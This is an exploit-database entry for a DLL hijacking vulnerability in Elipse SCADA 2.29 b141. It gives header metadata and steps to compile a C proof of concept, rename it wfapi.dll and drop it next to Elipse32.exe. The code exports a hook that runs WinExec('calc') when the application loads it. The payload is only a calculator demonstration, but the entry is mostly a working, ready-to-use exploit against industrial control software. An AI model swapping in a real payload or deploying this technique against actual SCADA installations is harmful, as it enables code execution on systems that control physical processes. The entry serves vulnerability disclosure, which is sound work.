Elipse SCADA 2.29 b141 - DLL Hijacking



EKU-ID: 4740 CVE: OSVDB-ID:
Author: PETER CHENG Published: 2015-04-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#[+] Author: PETER CHENG

#[+] Exploit Title: Elipse SCADA DLL Hijacking
#[+] Date: 09-04-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor Homepage: http://www.elipse.com.br/
#[+] Software Link: http://www.elipse.com.br/eng/download_scada.aspx
#[+] Version: Elipse32.exe version - 2.29 b141]
#[+] Create and Compile the file then rename it to wfapi.dll and put it to the dir which the same with file Elipse32.exe, double-click #to run Elipse32.exe to launch the app.


#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void hook_startup() { exp(); }
  
int exp()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}